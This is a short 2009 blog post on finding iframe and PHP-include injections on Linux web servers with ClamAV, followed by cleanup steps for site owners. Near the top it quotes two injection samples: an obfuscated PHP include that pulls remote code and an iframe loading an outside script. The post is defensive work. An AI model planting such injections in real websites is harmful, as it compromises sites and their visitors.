Published on: April 21, 2009 by George K.
Do you really need to do virus scan to ensure Linux server security ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below
< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >
Below are a few URLs which could help you in the process
You can install clamav antivirus which is open source and do a clamav scan to make sure that the website is not affected. On a cPanel server, the below command will scan the entire website files of each users.
clamscan -i -r –remove /home/*/public_html/
Why would I recommend clamav over other paid antivirus ? For obvious reasons that you can edit ClamAV rules to include more iframe detection rules. Just write a new regex rules in the clamav virus DBs and you have the situation under control, at least for those matching iframe codes.
Here I was talking about Linux server security. Once infected, there are a few things client has to do as well.
1. Scan your machine as well as your webmaster’ with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.
Category : Linux, Security